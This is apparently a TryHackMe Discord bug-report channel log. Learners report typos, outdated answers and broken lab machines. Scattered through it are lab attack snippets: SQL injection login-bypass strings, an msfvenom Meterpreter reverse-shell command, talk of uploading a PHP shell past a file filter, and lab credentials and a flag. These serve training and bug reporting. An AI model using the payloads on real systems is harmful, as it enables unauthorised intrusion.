#room-bugs
¯_(ツ)_/¯
it's a link in another room
what room
Probably wrong room linked.
And the room that's linked is marked private due to either being broken, or old.
As I can still access it.
Likely the one in the screenshot 😄
Threat Intelligence Tools, task 5, "What is the Originating IP address? Defang the IP address." and the Answer format is ****.****.*****.*** no way that's correct.
Why not?
I'm fool my friend
thanks mate
Gave +1 Rep to @quaint sparrow
they already explained it to me 🤣
Apparently the AD Networks have connectivity problems, i was unable to resolve DNS in the lateral movement and exploiting AD network, restarting the Network and recreating the OVPN file did not help. Yesterday i couldn't ping either, despite the Access page telling me i was connected. More and more people seem to be affected.
How are you accessing the networks?
Are you using an attackbox or a VM?
Did you do the steps?
Ie use the correct vpn.
Edit /etc/resolv.conf
?
i did
i can't access my VM from here unfortunately, i can tell you this evening which subnet i am on
the network IP of the lateral movement network is 10.200.64.0 at the moment
if that helps
https://tryhackme.com/room/threatinteltools
The value for this is not constant and will keep on changing on the urlscan.io, wondering why the value is kept static for this?
Got to have this checked.
Ah lol, its based on the screenshot, then its fine LOL
Woah! Glad to see you around!
HAHA, thanks @dusky junco, i need to get active back again!
Gave +1 Rep to @dusky junco
?
https://tryhackme.com/room/wreath HAVING ERROR WITH WREATH ROOM. it redirects me to "/rooms" when try to join room
How do I add screenshots
You need to verify your account.
!docs verify
Im pretty sure thats an ICMP request, so the question answer is wrong, right?
Ping it.
Yeah.
damn, now I feel stupid. thanks
Gave +1 Rep to @quaint sparrow
Not stupid, you're just over thinking it.
You're not the first to nmap it, and you won't be the last.
so why does it respond the nmap -pe and not the ping? Network Filtering??
On room windowsprivesc20 task 5, the windows defender of the machine catches the msfvenom generated on the part "insecure service permissions"
In the WebOSINT room, Task 2, Question 5. The registered city changed from what the answer should be to
"Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region"
Not sure if this is a bug or intended but the windows defender is running in the lateralmovement network and blocks and deletes mimikatz
Isn't it another typo in this room?
I need help with one of the links in content discovery
Which link?
sitemap.xl
sitemap.xml ?
Can you show a screenshot?
Linux your host or vm?
Vm
Then use Windows Snipping Tool?
it works now
Room: Linux Fundamentals Part 3
Task: 4
Got my friend confused
Another good point.
The flag isn't in the tmp folder, it's in the folder the ssh enters.
in the pentesting fundamentals room, in the info gathering section of the methodologies task, publicly is spelled wrong (publically)
Incorrect filename: In the Sysmon room, Task 6, the instructions tell you to open Hunting_LSASS.evtx, when it should say :Hunting_Mimikatz.evtx.
small spelling mistake
It may be a mistake in the way I am interpreting it, but in the Metasploit: Exploitation room in the msfvenom section, this one Task question says to use the victim IP, but you have to use the attacking machine IP - it even says ATTACKING in there for some reason in the command too.
Maybe I am missing something, but I even tried also putting the ATTACK IP and it didn't work
is this outdated?
https://tryhackme.com/room/redteamthreatintel
or is it like, only the blue ones? kinda weird why they say 16 techniques then. any reason for that?
isn't the folder view on the left?
https://tryhackme.com/room/introtoc2
Hello, it seems that this room has a small annoying bug that causes the machine to disconnect after 40 or 50 minutes on. Even though there are still several minutes left of the 2 hours proposed in the paid plan.
@winged jewel
I think I found a bug but will need someone to check if it was a fluke.
room: https://tryhackme.com/room/nmap01
task: 3
question: 1
"What is the first IP address Nmap would scan if you provided 10.10.12.13/29 as your target?"
I accidentally put "10.10.12." and it accepted the answer. after refreshing the page it filled in the correct answer ||10.10.12.8||
Answer tolerance
hmmm. thats pretty tolerant lol
what are the rules for that? because its not like you can leave a 1 character question blank. id be interested to see how far it can be pushed lol
It doesn’t work for all questions but if an answer is 95% correct it will be accepted.
I had noticed previously that if I fat finger an extra letter in at the end it still accepts it. Didn't think it would work the other way tbh. Thanks for the reply tho. Now I know
Gave +1 Rep to @hazy tiger
Hi! I'm trying to join 'Linux Fundamentals Part 2 & 1' but it's always redirecting me to 'My Rooms' page instead of joining those rooms, and the Part 3 works just fine. Can somebody try and join those rooms to see if this problem can occur with other users or if it's just a problem with me? Thanks in advance!
I’ll check right now. Give me a moment
@sly wind I can join Linux fundamental part 1 & 2 with no issue. Try using a different browser, restarting pc, and possibly even wifi
Then it's a me problem. I've already tried on different browsers and this problem persisted a while ago since I noticed. I'll try restarting the wifi and pc anyway.
Gotcha- sorry I’m not THM staff. Just figured I could check and try to help
That's fine. I still can't join the room and it seems that the problem is around my account.
Thanks for the help anyways!
I've already sent a ticket. Hope they fix it soon.
No worries. Good luck mate
i was active yesterday and was at 53 days now i'm at 0. can someone check this out?
https://tryhackme.com/room/linuxfundamentalspart2 , Task: 5
"Let's use the "cmnatic.pem" file in our initial screenshot at the top of this task."
Screenshot:
tryhackme@linux2:~$ ls -lh
-rw-r--r-- 1 cmnatic cmnatic 0 Feb 19 10:37 file1
-rw-r--r-- 8 cmnatic cmnatic 0 Feb 19 10:37 file2
The Statement should mention "cmnatic" file (there is no .pem), or since ownership has not been explained just "file1"
Check #announcements, and write an email
Linux fundamentals pt 1 task 4 whoami request basically it has me signed in as root access however root isn’t the answer so yeah
that means you're interacting with the wrong machine - the attackbox. You need to use the machine that you deploy in the task that can be done by pressing the green "Start Machine" button
Can't remember off the top of my head what task it is in (probably near the top)
Good catch. I'll get this updated 👍
Linux fundamentals part 2 where it ask to log in after going through the steps the password doesn’t seem to work for some reason?
windowsfundamentals1xbx task2
Then arrived Windows 10, which is the current Windows operating system version for desktop computers.
Windows 10it comes in 2 flavors, Home and Pro. You can read the difference between the Home and Pro here.
Later is mentioned that Windows 11 is the current.
i think this is a error
room: https://tryhackme.com/room/passwordattacks
task: 5
Hey, could you share the room URL and task? Hard to guess ^^
yes
SHA-1 should work
the toolboxvim room is missing an image
On the Wazuh room, task 6, the highlighted link showing what machine IP you are supposed to be connected to, is static instead of dynamic to the correct active machine IP.
hey 👋 I've just updated this. If you refresh the page, it should show the dynamic IP / IP of the machine that you've deployed? 🙂
Confirmed! Thank you for your quick response
Gave +1 Rep to @dusky junco
awesome. TY for reporting(:
Gave +1 Rep to @static grotto
The machine for Day 23 (Task 28) in https://tryhackme.com/room/25daysofchristmas seems broken - it's not accepting any file uploads (images or otherwise).
Can anyone confirm? (RE Question 5)
It's XSS, you don't need to upload a file
Task 23 is XSS - Day 23 (Task 28) is SQLi for Q's 1-4 and then looking for a reverse shell vector
(clarified above)
https://tryhackme.com/room/threatinteltools
Hello,
Task 3
Q1. What is TryHackMe's Cisco Umbrella Rank?
Q2. How many domains did UrlScan.io identify?
Q4. What is the main IP address identified?
the answers according to urlscan.io are not accepted as valid answers, seems that they haven't been updated with the latest information https://urlscan.io/result/e866f698-7585-4275-82a9-6695fedb2041/
You might need to use the screenshots in the task.
oh got it thanks
Shouldn't this be timestamp rather than timeline in the diamond model room?
Hi there, struggling with task 6 on the SQL Injection room https://tryhackme.com/room/sqlinjectionlm
I'm copying and pasting the ' OR 1=1;-- text into the password field and hitting Login, and it simply does nothing 😢
-- -
I've been informed and double checked that doing this (following the instructions) is all I should need to do for this
this was in reference to following the Task 6 instructions "Blind SQLi - Authentication Bypass" and simply copy pasting the above value to the password field, unfortunately @rugged canyon's recommendation of changing the -- to -- - didn't make any difference 😦
yeah sorry Task 6, Level 2 (probably what got us confused)
probably not a bug... would recommend trying to get help in #room-help
thanks I'll drop a message there cheers
good luck and hope someone can figure out how to help
for some reason switching to the following SQL query worked select * from users where username='a' and password='a' OR TRUE;--' LIMIT 1; by providing username a and the password a' OR TRUE;--
but for me, at least, the bypass in the instructions did not work
Holo Network, Task 20, below the SUID permissions explanation screenshot says the following:
Once we have identified a file that we thank may be exploitable, we need to search for an exploit for it.
Should be think
No idea where this should go, as it's not really a bug, but regarding the room "Red Team Fundamentals", and probably others, the term of cyber kill chains is used multiple times as a fundamental concept, for example referencing MITRE ATT&CK. I honestly don't understand why, the concept of kill chains is questionable at best outside of specifically simulated attacks, and MITRE explicitly stated themselves that it should not be used in this way
The ATT&CK framework is not intended to be interpreted as linear—with the adversary moving through the tactics in a straight line (i.e., left to right) in order to accomplish their goal. Additionally, an adversary does not need to use all of the ATT&CK tactics in order to achieve their operational goals
https://www.cisa.gov/sites/default/files/publications/Best Practices for MITRE ATTCK Mapping.pdf
Additionally, most incidents are super short, with the most common number of steps in recorded breaches being just one (1). (Verizon Data Breach Investigation Reports).
Room: https://tryhackme.com/room/webenumerationv2
Task 6: There are some virtual hosts running on this server. What are they?
After running gobuster vhost -u http://10.10.35.223 -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt, I get no results
What I tried:
restarting machine
adding webenum.thm to /etc/hosts
adding --append-domain webenum.thm to the gobuster command
updating SecLists
pinging machine
SOLVED
It turns out I was supposed to use gobuster vhost http://webenum.thm instead of the machine IP
(Which is absolutely impossible to know if you're a beginner)
The screenshots show you to add to the vhost.
I understand it might not be beginner friendly, but if you use the vhost name instead of the ip going forward.
Which screenshots?
The ones in the task.
No, the ones on Task 6.
It shows you adding to the hosts.
But that screenshot you sent uses the named address.
Ah yes, but that was not the issue here
The issue is that a beginner cannot possibly know he's supposed to use
gobuster vhost http://webenum.thm
I can guarantee every beginner will be stuck here trying to run
gobuster vhost http://MACHINE_IP
gobuster's help page on vhosts also says that you probably want to run it against the ip instead of a domain name soooo yeah
Even going by the screenshots.
THM could possibly reflect the screenshot to say webenum.thm
$ gobuster vhost --help
Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter)
Usage:
gobuster vhost [flags]
Flags:
which could also cause confusion
though obviously tryhackme can't change the gobuster help page but a note about it somewhere would probably help
Same problem in https://tryhackme.com/room/webenumerationv2
Task 9 --- 2.2. Practical: WPScan (Deploy #2)
When scanning for theme: wpscan --url <URL> --enumerate t
We have to use wpscan webenum.thm --enumerate t instead of the IP of the deployed machine.
Some people might experiment and find this out like I did, but I'm pretty sure some will get stuck
Also
Hint for the version of the theme says the answer is "2.3", but it's actually "2.5"
Hi everyone, on the room MalBuster are the answers 3 and 4 not up to date anymore...
Room: https://tryhackme.com/room/uploadvulns
Task: 7
The web app 'java.uploadvulns.thm' doesn't allow legitimate jpeg/jpg file uploads.
I tried multiple pictures, small and big sizes, I tried both .jpg and .jpeg, and I tried a php shell with both .jpg and .jpeg extensions.
The response is always "Invalid File Type".
This can be solved by bypassing the filter, but there is an example of uploading a shell with a legitimate extension (.jpg, .jpeg), intercepting using Burp Suite, and changing the extension back to .php.
This can't be done since the web app doesn't allow any uploads at all without bypassing the filter. 🙂
Using webenum.thm instead of the IP should be clear, since the first instruction tells you to add that hostname to your file
Regarding the issue for the hint:
We decided to remove that question entirely as it would require constant updating 🙂
So thanks for reporting
Gave +1 Rep to @errant grail
Glad I could help 👍
how can I share a screenshot for a bug?
!docs verify
^^
is it not 18.04.6 ?
No, you need to ssh in to the user, you're running that command on the attackbox
It tells you above the questions.
Done!
Bot do your job
Intermediate Nmap: ssh couldn't connect, it times out. $ ssh ubuntu@10.10.72.110
how can i solve them
Do you need to ssh in?
yes because flag inside box
Can you link the room?
Where did you get those credentials from?
from nmap scanning
Do you have a machine open?
For these credentials, what are you doing?
there are 4 ports in total but 31337 port cmd netcat get credentials. to try ssh. but it's not working
Yes, what are you entering for credentials?
ssh <user>@<ip address> -p <port number >
yes its timeout
can i use this user: ubuntu pass: Dafdas!!/str0ng
Yes.
I was able to ssh in using those credentials.
but it's not working for my pc.
ok thank you friend .it's really helpful for me
Hey guys!
In the AD modules I can't connect to the Lateralmovementandpivoting VPN:
Pinging 10.50.61.172 with 32 bytes of data:
Request timed out.
Even the attackbox doesn't ping the THMDC:
PING 10.200.64.101 (10.200.64.101) 56(84) bytes of data.
From 10.50.61.1 icmp_seq=1 Destination Host Unreachable
Please fix this issue
https://tryhackme.com/room/mitre - Task 7.
Center of Threat-Informed Defense
https://mitre-engenuity.org/ctid/
is a broken link, valid link might be
https://mitre-engenuity.org/cybersecurity/center-for-threat-informed-defense/
Thanks, I just ran into this problem. I can confirm after I did db_disconnect, the post module works fine.
It's actually task 6 on https://tryhackme.com/room/metasploitexploitation
I also noticed that my guacamole shell resets every time I switched from the victim to the attacker machine.
If this can't be avoided, I think it would be good to mention to run the shell.elf in the background with ./shell.elf & or to open the two machines in separate tabs.
Gave +1 Rep to @drifting kindle
brainstorm has only 3 ports open but the answer to the question how many ports are open is 6 for some reason
should be a quick fix to just change the answer
This is minor but there is an extra space in a number. It's the new Risk Management Room, Task 6 in the last equation. It says "ALE = SLE × ARO = $9000 × 0.5 = $4, 500.. It should say "ALE = SLE × ARO = $9000 × 0.5 = $4,500 " without a space after the comma and without the period at the end.
Hello, can anyone tell me how to resolve an issue I am having with the Wireshark 101 room? I can not submit my answers after I input them. Either submit or completed none is functional
Do not worry guys, I figured it out. Thanks
dm'd. Not gonna spam here
everything OK? Dont hesitate to DM if there's trouble
In the room Risk Management, Task 7 Respond to Risk, one of the scenarios has the before the safeguard EF at 1% and after the safeguard EF at 10%. When I run the calculations, I seem to always get this one incorrect. Not sure if this is a bug or I'm making a mistake in my calculations, but for the EF to increase after the safeguard, seems like a bug.
Asset: Laptop
Risk: Malware
Asset Value: 2000
EF: 1%
ARO: 2
Safeguard: Antivirus license
Cost of Safeguard: $20
EF after Safeguard: 10%
Not sure if this counts as a bug, but doing the passive reconnaissance room, Task 6 (shodan) it asks
Based on Shodan.io, what is the 3rd most common port used for nginx?
The answer is 888 but the search now states 5001
Wait why are people using 5001 now?
I would imagine that is apps being reverse proxied rather than say nginx itself listening on port 5001
Even on a reverse proxy though, the exposed port is nginx's not whatever node app is running behind
yeah true I guess it just depends how shodan is crawling it
Hello everyone,
I'm stuck with the question below
Referencing the dmarcian SPF syntax table, what prefix character can be added to the "all" mechanism to ensure a "softfail" result?
I answered v=spf1 ~all but it does accept the answer
This room is on SOC ANALYST 1 - Phishing - phishing prevention - Task 2 - SPF.
I think https://tryhackme.com/room/introtoshells -> Task 9 question 3 should be linux/x64 and not windows x64:|| msfvenom -p windows/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=10.10.10.5 LPORT=443||
reload the page and check what it says the flag is again
think you got it through due to answer tolerances
Now it says linux. Thanks for fixing it!
Gave +1 Rep to @rugged canyon
shadow did not fix it... on tryhackme if you submit an answer and it is very few letters off it will take it as the correct answer.... when you reload the page after it shows you the correct answer to the question in the submission box
Good to know! Maybe windows should be blacklisted because it's not really the correct answer.
I have one question for Task 13 in the same room. Should the encoded PowerShell payload from task 11 work there if I uploaded a basic php cmd RCE?
don't think there is any denylist available for question answers
Nevermind about the powershell. I tried it again and now it's working
Found something else:
https://tryhackme.com/room/introtoshells Task 8:
There is no /usr/share/windows-resources/binaries on the attack box.
:Wave:
Looks like the answer for question 14/15 in https://tryhackme.com/room/autopsy2ze0 is only accepting when the answer contains parentheses () in place of the back-ticks (`) contained in the actual file/memory-dump.
the assembly emulator is not working in the x86 Assembly crash course room
is it just me or someone has the same problem?
Exploiting AD Network Task 2:
Under „AddMember“ it says „Start PowerShell (either in RDP or via SSH) on the THMJMP1 host“, with this probably THMWRK1 is meant.
This isn‘t a bug but I wanted to report it anyways to avoid confusion, didn‘t know where else to post it.
hello guys, I'm currently following the CTI module, however, in the TI Tools room, task 5, "phishtool", the VM has no access to internet, hence, I can't use firefox with phishtool. I raised a ticket but it will take long time, I suppose.
as I have no time to lose 😄 could anyone send me the last 2 answers?
I would really like to complete this room today
You should be able to use Thunderbird to open the email
hi, cant access any path or module
trying to upload now pictures to show what I mean
Windows Fundamentals 2, Task 5, Question: What is listed under System Name?
It's meant to be What is the value of System Name? instead.
At first sight, I thought it was asking for System Manufacturer.
I don't know If It counts as a room-bug. Please inform me
sorry, cant find upload pics button
!docs verify
hey guys, anyone else have an issue with the MySQL service not being started on the ContainMe box?
{unix_user}@host2:~$ mysql -u{some_user} -p{some_password}
mysql -umike -ppassword
mysql: [Warning] Using a password on the command line interface can be insecure.
ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)
just an image, well actually not an image
link:https://tryhackme.com/room/dataxexfilt
Hi ibadov, replying a bit late. The form actually works... if you use a space between each number. It took me time to figure it out. I don't get why the code is not simply stripping them before checking the answer...
Hi, this may not be a bug as it seems more like a typo but in the OWASP API Security Top 10-1 room under task 4 it asks you to add an Authorisation-Token header, but it seems to only work with the American Authorization-Token spelling.
https://tryhackme.com/room/loggingforaccountability
Task 6
What utility was used in the oldest event associated with "James"?
Impossible to find
In the Network Device Hardening room task 4 question 2 does not match the config file. https://tryhackme.com/room/networkdevicehardening
In the risk management room, the copy button of the final task copies the wrong Flag. 🙂
Not sure if this is caused by my bionic reading extension, but there's some non-breaking space characters in the Conclusion section of the Security Engineer Intro room.
Can you disable it and check?
https://tryhackme.com/room/burpsuiteom
task 7:
spelling error:
Thank you for reporting. 🙂
Gave +1 Rep to @manic island
hey there is a question in room SSDLC which i finally worked out the answer to it but it makes no sense.
question is
When do you typically carry out Vulnerability Assessments or Pentests?
now an answer that would make sense is , once a year or after upgrade etc.
am i allowed to say what the answer is?
They're asking which project stage
I think they mean the first pentest
task 7 in SSDLC
the answer isnt a when though , its a what.
its like asking 'when do you get your car serviced and you answer
mechanic & automotive
makes no sense
It's a lifecycle phase
So when makes sense in that context
maybe if the question was during what phase, during when, or at least have the answer include DURING such n such PHASE. wasted like 30 min trying to work out a "when" answer lol
I mean if you read the task it would be obvious enough 😉
Exactly, sometimes reading obviously will reveal the answer.
Hello, I'm not sure where to post my message and I apologize if I'm not in the right place.
Is it normal that I experience a lot of lag on remote machines (I've tested 2: pickle rick & Basic Pentesting) and the problem is the same everywhere:
- loss of ping
- loss of connection
- temporary inaccessibility
- ...
this makes it impossible to work, is the problem coming from me?
Hey all, I'm having an issue with oh my webserver where port 80 is not open. Is that intended?
^
Just spotted that there is a small typo in https://tryhackme.com/room/securityprinciples. In Task 4, Biba model, it says "Start Integrity Property" and should say "Star Integrity .."
https://tryhackme.com/room/owaspapisecuritytop105w
task 4 - Question 2 To which country does sales@mht.com belong?
This Requires using a header called Authorization-Token instead of Authorisation-Token (typo) someone noted that in the room forum, idk if it's worth correcting @glad badger
hey i cant open/join the room page/room from https://tryhackme.com/module/hacking-active-directory, the first one works but the others not...
On the risk management room when I got to the very end if I hit copy on the flag it gives me this random other flag instead of the correct one.
I assume its an old flag from before the update? idk
Is the issue solved? If the issue isn't fixed, you can try to copy-paste from the source code.
mine? I just copy pasted it manually and that works. its only if you hit the copy button there on the side i think
I had to do the last part twice cuz my stupid ass closed it before hitting paste just assuming it would have copied the right thing lol
Okay, no problem, if your issue is solved that's good, congratulations again.
So a member of my team created a room and gave it out to the team but it seems like the people who have premium are the only ones getting nmap results back. Is there an issue with free users not being able to scan private boxes?
@raw bison @glad badger @lucid oasis Could you please support us ? thanks in advance for reply !
Gave +1 Rep to @polar geode
Yes thanks team! Big fan of yall 🙂
For free users it will have limited resources for private rooms. 🙂
Sorry if I'm being redundant but does that include limited capabilities for performing network scans?
Good question, okey is limited the access to room, but process ? @glad badger
Just a small extra note, even with my answers they can't connect to the attacking machine
Nope, there's no specific limitations like that. Machines deploy with increased resources (RAM) for subscribers.
If a free user isn't getting a response i.e nmap scan but a subscriber is, it means the services on the machine haven't been able to start for the free users because of the amount of RAM (512mb)
Yee it was less of a problem i needed help on and more of a bug report 😀
Thank you Ben. That makes sense. Really appreciate the help on this
I'll make sure to communicate this to my team
Gave +1 Rep to @dusky junco
No problem. When developing the VM, it's worth to test/consider in mind how it performs for free users and such 🙂 (512MB RAM for free - 1GB RAM for subscriber) by default
Worse comes to worse I think they also had an OVA they might pass around because I know not all are able to upgrade their accounts. But I might end up developing rooms in the future so now I know what to test 🙂 thanks again. Really appreciate the quick efforts and the support
Gave +1 Rep to @dusky junco
You're more than welcome:)
Security Engineer paths <- the calculation is wrong 😉
Yes, for now a bug is available.
When I was working on the Lateral Movement and Pivoting room, connection timed out; no servers could be reached.
problem, but there is no problem with the Exploiting Active Directory room. I am using attackbox. Can anyone tell me how to solve this problem?
Hey, if there isn't any issue with other rooms, there may be an issue on a router along the route. Can you run traceroute?
@dusky junco @gleaming shadow https://tryhackme.com/room/lateralmovementandpivoting There is a problem with VPN file of the related room, can you support ? @astral bear
What's the problem?
So I finished Managing Incidents and Network and System Security few days ago and I just noticed some of those progress have been deleted 😮
Room: Printer hacking 101
Task3: targeting & Exploitation
Issue: Cheat sheet reference material link no longer valid (http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet). Question 1 and question 2 refer to the use of this cheat sheet to answer the task.
There is a copy available on Wayback machine (https://web.archive.org/web/20230329224752/http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet)
Room: Splunk: Dashboards and Reports
Task 5: Alerting on High Priority Events
VM Name: Splunk_Dashboard
Issue: Alerts not enabled by attached Splunk license in deployed VM. can not follow along with the material.
The badge should be given (by what the description says) in the Risk Management room, and not the Vulnerability Management.
Room: Gaming Server
Task 1: What is the user flag?
Issue: It says answer incorrect even though the flag is correct
Game zone?
What flag do you have?
user.txt - a5c2ff8b9c2e3d4fe9d4ff2f1a5a6e7e
Hi team, I completed OWASP API rooms, but there is no badge in my Earned list. Could you help me with that?
Hey Aleks, if you completed the room before, you had need to reset the room but if you haven't completed the room before and still although that if you getting an error, you can fill up again the answers by resetting the room and of course, if your remember your answers.
Or open the room side and by side, and reset one, and just copy and paste the answers.
I completed it before, thanks @oblique panther and @quaint sparrow for your help! I'll reset and copy-paste.
Gave +1 Rep to @oblique panther
nope
it worked now nvm idk what was happening...
sry to disturb you
Definitely!
We thanks you, if your do a reply with a feedback positive or negative your answer, we will so glad.
Gave +1 Rep to @last creek
anyone know if the Net Sec Challenge ctf is bugged im doing exactly what the hint is telling me using the right password list to brute force ftp and its not working
It's not bugged
nope my bad i completed the room thank you
Hello,
I think the "Internal" room is broken.
It is impossible to load the wordpress part.
Only the "blog" page loads without the css and I can't access the wp-login page to continue.
White page?
sudo ip link set dev tun0 mtu 1200
Try this 🙂
I get this error message on wp-login:
Hmm. We're having trouble finding that site.
We can't connect to the server at internal.thm.
If you entered the right address, you can:
Try again later
Check your network connection
Check that Firefox has permission to access the web (you might be connected but behind a firewall)
Did you add the ip and website to your hosts file?
I'm using an AttackBox, there's no tun0 interface.
no, I'll try
It works. Thank you.
Gave +1 Rep to @quaint sparrow
in the h4cked room you have to guess the pentestmoney.net url because the site doesn't exist anymore. it also renders the question invalid.
Machines do not have internet
If that’s the AttackBox, I don’t know what happened there
that's my computers own vm lmao hold on
now it works
Issue with displaying split view / full screen in the room Velociraptor.
Regardless of browser, extensions, OS, incognito or not. I just end up with a white split view or land on a about:blank#blocked.
So far I've tried Edge, Chrome and Firefox. Incognito and no incognito.
Cleared Browser Cache and cookies.
On host machine (win10), vm with win10, and a kali vm.
On the vm's I've tried to use the tryhackme vpn to circumvent any network blocks on my local network.
@quaint sparrow Hi, can you support ?
No, there is nothing I can do about that.
So is it on tryhackmes end this problem?
Issue with Virtualization and Containers room. Unable to connect to 10.10.64.0:5000
Would love to post a screenshot but seems this discord server won't let me.
hey, I don't know if this counts as a bug, but I think something is wrong with the cluster in https://tryhackme.com/room/virtualizationandcontainers Virtualization and Containers task 6. I don't really know kubernetes much, but it looks like there is no proper communication and requests are timing out.
The app in task 5 runs just fine, btw. I was able to access it in the browser after initiating a container.
Task 6 is running fine for me but task 5 is not
Do you have the answer for task 5?
hahaha, that's funny. I don't know how backend works, maybe too many people at once try to connect. yeah, I do, you can DM me.
Exactly, there may be two reasons for this issue: first, the computer may not have found the right route, and second, there may be many more requests on the tryhackme server.
I know it can't communicate, because error messages say that, but I don't know if it fails because of some misconfig or too many requests.
Exactly, we need to examine the backplane or background to understand that is due to what.
Hello! I was going to do simpleCTF and saw the room is private, what happened? Is this a bug?
Can you link the room?
Yes, that room was replaced with https://tryhackme.com/room/easyctf
oh! awesome! thank you!
Happy hacking! 
These rooms are very high quality. However, I do come across the occasional typo. Should I inform someone or leave them alone for the most part?
If you think there are typos, post in #room-bugs
which is where they currently are
so yeah report typos here and hopefully they get fixed in a timely manner
https://tryhackme.com/room/iaaaidm
'''Eventually, the album permissions with show a few accounts with view permissions.'''
In task 9 under "Discretionary access control"
Was kinda a hard read till I noticed "with" instead of "will"
Logging for Accountability -> Splunk page loads partially, has the Splunk Enterprise logo with the green text background and a "Server Error" message. I have tried multiple times, last night and today using different machine instances, all to get the same page.
Also, I let it sit for 20+ minutes to give it plenty of time to load
In https://tryhackme.com/room/cybergovernanceregulation
In task 7, under "Service Organization Control 2", the underlined words "SOC" provide a definition for "security operations center" instead
OWASP Juice Shop was really unsatisfying i solved all the tasks and most of them won't give me back the flag i searched for online solutions and i really copy-pasted the flags to move forward.
Yes unfortunately the owasp juice shop room unsatisfying generally but it is not related with event that is available
In the room OWASP API Security Top 10 -1 Task 4, it says to use the header Authorisation-Token but it will return a 403 Forbidden because the header should be Authorization-Token (z instead of an s).
Is it a bug, sorry i asking for i don't know that ?
Hi guys
I want to report a concept issue which I am not sure about, In here the last arrow should be in the opposite direction right?
since POP3S used to retrieve not send emails
No, I think this impression is correct because how is an encrypted email sent to the client, rather it is sent encrypted by the client.
Sorry, still dont get it?
how would a client send an email using POP3S, POP3S is used to retrieve emails
this screenshot taken from the same room
Network Security Protocols
Because, there is an authentication and during authentication it is need to use an algorithm the client, and exactly in here the client sending by encrypting the email by using the algorithm that wants of the server.
do u mean that this email is The email sent by a client to ask the server to retrieve its emails?
It often requires email clients to use StartTLS to send mail that as mentioned it in here, and since port 25 was designed for mail transfer, not submission, in here exactly has to do this by encrypting.
The question is why would the client send an email, The protocol talks about retrieving emails from server
Where is the retrieval part?
StartTLS is used For encryption
The question is, after encryption where is the email I requested from the server?!
Bro, it is just the protocol process, the StartTLS doesn't care whether you got the email or not, and this is the protocol process anyway.
I get what you say but as I am completely sure, that retrieving the email is part of POP3S
Yes, exactly you are already taking email but there is a showing for StartTLS only in picture it and of course you are taking an email on POP3S, so you know right.
ok ty ty
I was just confused about the last arrow, I mean sending an encrypted email, Not the previous steps
Okey no problem, i'm happy if I did any help 🧐
Ty @oblique panther
Gave +1 Rep to @oblique panther
Thank you too!
Gave +1 Rep to @ornate solar
It's a typo
I believe @ornate solar is right and that the encrypted email is sent from the server to the client.
So the arrow should be to the left from everything I've gathered
Not sure if this is the right place, but talking to some people, we may want to update “Intro to C2” as Armitage is no longer kept up with, and is not really a relevant tool to the Red Team path
https://tryhackme.com/room/burpsuiteintruder
In Burp Suite: Intruder Room: Regarding this stmt: "Note: You should be getting 302 status code responses for every request in this attack. If you see 403 errors, then your macro is not working properly."
Out of 100 Intruder Requests, I get seven 403's every time when I do this exercise. My attack does find the correct solution, but am curious why my experience doesn't match the above note, namely "every request should be a 302"??
Suggestion: Edit the wording to something like "Note: You should be getting 302 status code responses for almost every request in this attack. If you see a majority of 403 errors, then your macro is not working properly."
In task 12 you're supposed to query /admin/login/. You shouldn't see any 403 at all with the right endpoint.
Interesting- that is the endpoint I used. Several THM members also experienced this. One solved it by adding a delay. I speculate this may be due to Cloudflare rate-limiting but would love to hear your thoughts.
btw, not sure if you're the room creator, but just wanted to share I took the Burp Series last year, and really like the new facelift on the content!
Oh sorry, I misread screenshot 🤦♂️ . I'm sure of nothing then. Maybe I didn't have problems because my internet connection is very bad
ok so an unwelcome "built in delay" baked into your internet. "It's a feature, not a bug!" lol
There should not be a WAF on that box, assuming they've just reused the one I originally built
Not sure why you're getting a mixture of status codes though, and I don't have access to debug now 🤷♂️
The thmlabs.com domain isn't proxying through Cloudflare either -- not sure if you were using that or not
Are you using Burp pro or the community edition?
community
Mhh, I just tried it and all I got was 1 403
I'll have a look if it might be something in regards to resources of the machine
It would be perfect!
Hello, I can't access the wreath machine, I have the correct vpn but cannot even ping it, is it normal?
Thanks for checking. My overall purpose was to soften the language around the Note section in the content of the room (see my original post) , so people don't get thrown by a few 403s, thinking they are doing something wrong. Also, from a learning perspective, it's always great to explore anomalies and unexpected behavior, especially with the room creator;)
Gave +1 Rep to @raw bison
In the manual discovery - Framework stack room of web fundamentals path. Task 6 asks you to view the thm-framework-login directory on the website to get a flag. On viewing that directory I get no flag though.
Doubt this is a bug, you are probably just looking at the wrong URL or something, what URL are you trying to access to get the flag?
"Let's take a look at that website. Viewing the documentation page gives us the path of the framework's administration portal, which gives us a flag if viewed on the Acme IT Support website."
That quote talks about the framework link
mhm, that is correct, you need to login from there to get the flag, the documentation page tells you the creds
sigh, why does my brain work like this. Ty and sorry for the bother
haha, no worries, sometimes we just miss the most obvious things
I don't have the Red teamer title (only the security warrior), but it's displayed as Red teamer in the leaderboards
Known issue. 🙂
I don't think they've changed the rank name in places.
If you use your thm profile badge. It still says it's lucky which was a rank 3 ranks.
Hello, there is no an issue with as my knowledge, if possible can you share a picture related with your issue ?
I can't access website through firefox but I can curl it
Did you try it with the other or another web browser ?
no because web browser is fine i can access other websites and locally hosted websites
same issue on different web browser
sudo ip link set dev tun0 mtu 1200
Can you please try this 🙂
In a separate terminal, leave the vpn running.
ok
woah that fixed it
thank you sooo much
Gave +1 Rep to @quaint sparrow
can you please explain it?
and any way to improve this
That command lowers the packet size that is sent over each transaction.
Nmap scans are also very slow
messing with min rate or timing params
no T5
-T4 or -T5 are the easiest ways to speed up nmap
You're scanning all ports. Lol
but none are showing up
-F is a sane alternative if you don't need to check all ports
what room are you doing???
Hi, I'm trying the MrRobot lab and when I scan with Nmap the first scan displayed ports 443 open. I was unable to browse to it, I have scanned again and this time port 443 is not showing on the scan. Anyone else experienced such issues?
could be that you did not let the target machine run long enough to spin up but eh dunno
how long do they usually have to spin up for? are we able to reboot the machines?
3-7 mins
yes you can reboot it by hitting the terminate button and then hitting the start machine button again
and there is no limits on how many times you can do that as far as shadow has heard or seen
I ran another scan and now I can see port 80. I'll leave it a few more minutes and then I'll reboot. Thank you
Gave +1 Rep to @rugged canyon
